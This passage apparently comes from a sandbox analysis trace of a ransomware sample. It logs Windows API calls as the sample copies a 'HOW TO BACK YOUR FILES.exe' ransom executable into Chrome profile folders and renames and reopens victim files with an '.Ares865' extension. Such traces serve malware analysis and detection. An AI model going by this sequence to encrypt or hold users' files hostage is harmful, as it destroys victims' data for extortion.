iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extension State") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extension State" [0104.008] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extension State" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extension State") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extension State" [0104.008] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.008] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extension State\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extension state\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.009] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.009] GetLastError () returned 0x0 [0104.009] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.009] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extension State\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x824ad030, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4f23f160, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4f23f160, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.009] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.009] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.009] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extension State\\000003.log.Ares865") returned 111 [0104.009] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extension State\\000003.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extension state\\000003.log"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extension State\\000003.log.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extension state\\000003.log.ares865"), dwFlags=0x1) returned 1 [0104.011] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extension State\\000003.log.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extension state\\000003.log.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0104.011] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1197) returned 1 [0104.014] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extension State\\CURRENT.Ares865") returned 108 [0104.014] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extension State\\CURRENT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extension state\\current"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extension State\\CURRENT.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extension state\\current.ares865"), dwFlags=0x1) returned 1 [0104.016] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extension State\\CURRENT.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extension state\\current.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0104.016] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=16) returned 1 [0104.019] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extension State\\LOCK.Ares865") returned 105 [0104.019] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extension State\\LOCK" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extension state\\lock"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extension State\\LOCK.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extension state\\lock.ares865"), dwFlags=0x1) returned 1 [0104.021] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extension State\\LOCK.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extension state\\lock.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0104.021] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=0) returned 1 [0104.021] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0104.021] CloseHandle (hObject=0x0) returned 0 [0104.021] CloseHandle (hObject=0x118) returned 1 [0104.021] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x824ad030, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x824ad030, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8c6f3fb0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x9a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LOG", cAlternateFileName="")) returned 1 [0104.021] lstrcmpiW (lpString1="LOG", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0104.021] lstrcmpiW (lpString1="LOG", lpString2="aoldtz.exe") returned 1 [0104.021] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extension State\\LOG.Ares865") returned 104 [0104.022] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extension State\\LOG" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extension state\\log"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extension State\\LOG.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extension state\\log.ares865"), dwFlags=0x1) returned 1 [0104.023] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extension State\\LOG.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extension state\\log.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0104.023] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=154) returned 1 [0104.026] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extension State\\MANIFEST-000001.Ares865") returned 116 [0104.026] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extension State\\MANIFEST-000001" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extension state\\manifest-000001"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extension State\\MANIFEST-000001.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extension state\\manifest-000001.ares865"), dwFlags=0x1) returned 1 [0104.028] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extension State\\MANIFEST-000001.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extension state\\manifest-000001.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0104.028] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=41) returned 1 [0104.032] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extension Rules", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extension Rules") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extension Rules" [0104.032] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extension Rules" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extension Rules") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extension Rules" [0104.032] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.033] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extension Rules\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extension rules\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.033] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.033] GetLastError () returned 0x0 [0104.034] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.034] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extension Rules\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82ad9940, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4f2652c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4f2652c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.034] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.034] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.034] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extension Rules\\000003.log.Ares865") returned 111 [0104.034] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extension Rules\\000003.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extension rules\\000003.log"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extension Rules\\000003.log.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extension rules\\000003.log.ares865"), dwFlags=0x1) returned 1 [0104.035] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extension Rules\\000003.log.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extension rules\\000003.log.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0104.036] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=342) returned 1 [0104.040] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extension Rules\\CURRENT.Ares865") returned 108 [0104.040] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extension Rules\\CURRENT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extension rules\\current"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extension Rules\\CURRENT.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extension rules\\current.ares865"), dwFlags=0x1) returned 1 [0104.042] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extension Rules\\CURRENT.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extension rules\\current.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0104.042] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=16) returned 1 [0104.045] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extension Rules\\LOCK.Ares865") returned 105 [0104.046] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extension Rules\\LOCK" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extension rules\\lock"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extension Rules\\LOCK.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extension rules\\lock.ares865"), dwFlags=0x1) returned 1 [0104.047] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extension Rules\\LOCK.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extension rules\\lock.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0104.047] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=0) returned 1 [0104.047] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0104.047] CloseHandle (hObject=0x0) returned 0 [0104.048] CloseHandle (hObject=0x118) returned 1 [0104.048] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x82ad9940, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x82ad9940, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8dae37f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x9a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LOG", cAlternateFileName="")) returned 1 [0104.048] lstrcmpiW (lpString1="LOG", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0104.048] lstrcmpiW (lpString1="LOG", lpString2="aoldtz.exe") returned 1 [0104.048] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extension Rules\\LOG.Ares865") returned 104 [0104.048] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extension Rules\\LOG" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extension rules\\log"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extension Rules\\LOG.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extension rules\\log.ares865"), dwFlags=0x1) returned 1 [0104.049] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extension Rules\\LOG.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extension rules\\log.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0104.050] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=154) returned 1 [0104.054] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extension Rules\\MANIFEST-000001.Ares865") returned 116 [0104.054] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extension Rules\\MANIFEST-000001" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extension rules\\manifest-000001"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extension Rules\\MANIFEST-000001.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extension rules\\manifest-000001.ares865"), dwFlags=0x1) returned 1 [0104.055] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extension Rules\\MANIFEST-000001.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extension rules\\manifest-000001.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0104.056] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=41) returned 1 [0104.061] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb" [0104.062] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb" [0104.062] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.062] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.062] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.063] GetLastError () returned 0x0 [0104.063] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.063] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x802d66a0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4f3e2080, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4f3e2080, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.063] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.063] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.063] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\000003.log.Ares865") returned 124 [0104.063] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\000003.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\000003.log"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\000003.log.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\000003.log.ares865"), dwFlags=0x1) returned 1 [0104.065] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\000003.log.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\000003.log.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0104.065] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=0) returned 1 [0104.065] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0104.065] CloseHandle (hObject=0x0) returned 0 [0104.065] CloseHandle (hObject=0x118) returned 1 [0104.065] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x802d66a0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x802d66a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x804795c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x10, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CURRENT", cAlternateFileName="")) returned 1 [0104.065] lstrcmpiW (lpString1="CURRENT", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.065] lstrcmpiW (lpString1="CURRENT", lpString2="aoldtz.exe") returned 1 [0104.065] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\CURRENT.Ares865") returned 121 [0104.065] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\CURRENT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\current"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\CURRENT.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\current.ares865"), dwFlags=0x1) returned 1 [0104.067] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\CURRENT.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\current.ares865"), 